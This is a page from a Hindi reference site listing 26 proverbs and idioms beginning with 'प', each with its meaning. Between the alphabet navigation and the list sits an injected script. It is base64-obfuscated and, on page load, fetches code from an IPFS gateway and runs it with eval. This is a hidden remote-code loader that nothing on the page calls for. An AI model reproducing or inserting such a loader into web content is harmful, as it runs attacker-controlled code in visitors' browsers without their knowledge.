कहावत लोकोक्ति मुहावरे-प

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

कहावत लोकोक्ति मुहावरे वर्णमाला क्रमानुसार खोजें

                              अं                                                                                              क्ष    त्र    श्र

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

कहावत लोकोक्ति मुहावरे अर्थ
1- पंच कहे बिल्ली तो बिल्ली‍ ही सही। अर्थ - सर्वसम्मति से जो काम हो जाए, वही ठीक।
2- पंचों का कहना सिर माथे, पर परनाला वहीं रहेगा। अर्थ - दूसरों की सुनकर भी अपने मन की करना।
3- पकाई खीर पर हो गया दलिया। अर्थ - दुर्भाग्य।
4- पगड़ी रख,घी चख। अर्थ - मान–सम्मान से ही जीवन का आनंद है।
5- पढ़े तो हैं गुने नहीं। अर्थ - पढ़- लिखकर भी अनुभवहीन।
6- पढ़े फारसी बेचे तेल,यह देखो करमों का खेल। अर्थ - गुणवान होने पर भी दुर्भाग्य से छोटा काम मिला है।
7- पत्थर को जोंक नहीं लगती। अर्थ - निर्मम आदमी पर कोई असर नहीं पड़ता।
8- पत्थर मोम नहीं होता। अर्थ - निर्मम आदमी में दया नहीं होती।
9- पराया धर थूकने का भी डर। अर्थ - दूसरे के घर में संकोच रहता है।
10- पराये धन पर लक्ष्मी नारायण। अर्थ - दूसरे के धन पर गुलछर्रे उड़ाना।
11- पहले तोलो, पीछे बोलो। अर्थ - बात समझ-सोचकर करनी चाहिए।
12- पाँच पंच मिल कीजे काजा, हारे-जीते कुछ नहीं लाजा। अर्थ - मिलकर काम करने पर हार-जीत की ज़िम्मेदारी एक पर नहीं आती।
13- पाँचों उँगलियाँ घी में। अर्थ - सब लाभ ही लाभ।
14- पाँचों उँगलियाँ बराबर नहीं होतीं। अर्थ - सब आदमी एक जैसे नहीं होते।
15- पाँचों सवारों में मिलना। अर्थ - अपने को बड़े व्यक्तियों में गिनना।
16- पागलों के क्या सींग होते हैं। अर्थ - पागल भी साधारण लोगों में होते हैं।
17- पानी पीकर जात पूछते हो। अर्थ - काम करने के बाद उसके अच्छे - बुरे पहलुओं पर विचार क्यों ?
18- पाप का घड़ा भरकर डूबता है। अर्थ - पाप जब बढ़ जाता है तब विनाश होता है।
19- पिया गए परदेश, अब डर काहे का। अर्थ - जब कोई निगरानी करने वाला न हो, तो मौज उड़ाना।
20- पीर बावर्ची भिस्ती खर। अर्थ - सब तरह का काम एक को करना पड़ता है।
21- पूत के पाँव पालने में पहचाने जाते हैं अर्थ - भविष्य क्या होगा, उसे वर्तमान के लक्षणों से जाना जा सकता है।
22- पूत सपूत तो काहे धन संचै, पूत कपूत तो काहे धन संचै। अर्थ - धन का संचय अच्छा, नहीं।
23- पूरब जाओ या पच्छिम, वही करम के लच्छन। अर्थ - भाग्य और स्वभाव सब स्थान साथ रहता है।
24- पेड़ फल से जाना जाता है। अर्थ - कर्म का महत्त्व उसके परिणाम से होता है।
25- पैसा गाँठ का, ज़ोरू साथ की। अर्थ - अपने पास पैसा और पत्नी हो तो जीवन सुखी रहता है।
26- प्यासा कुएँ के पास जाता है अर्थ - जिसे गरज़ होती है वही दूसरों के पास जाता है।।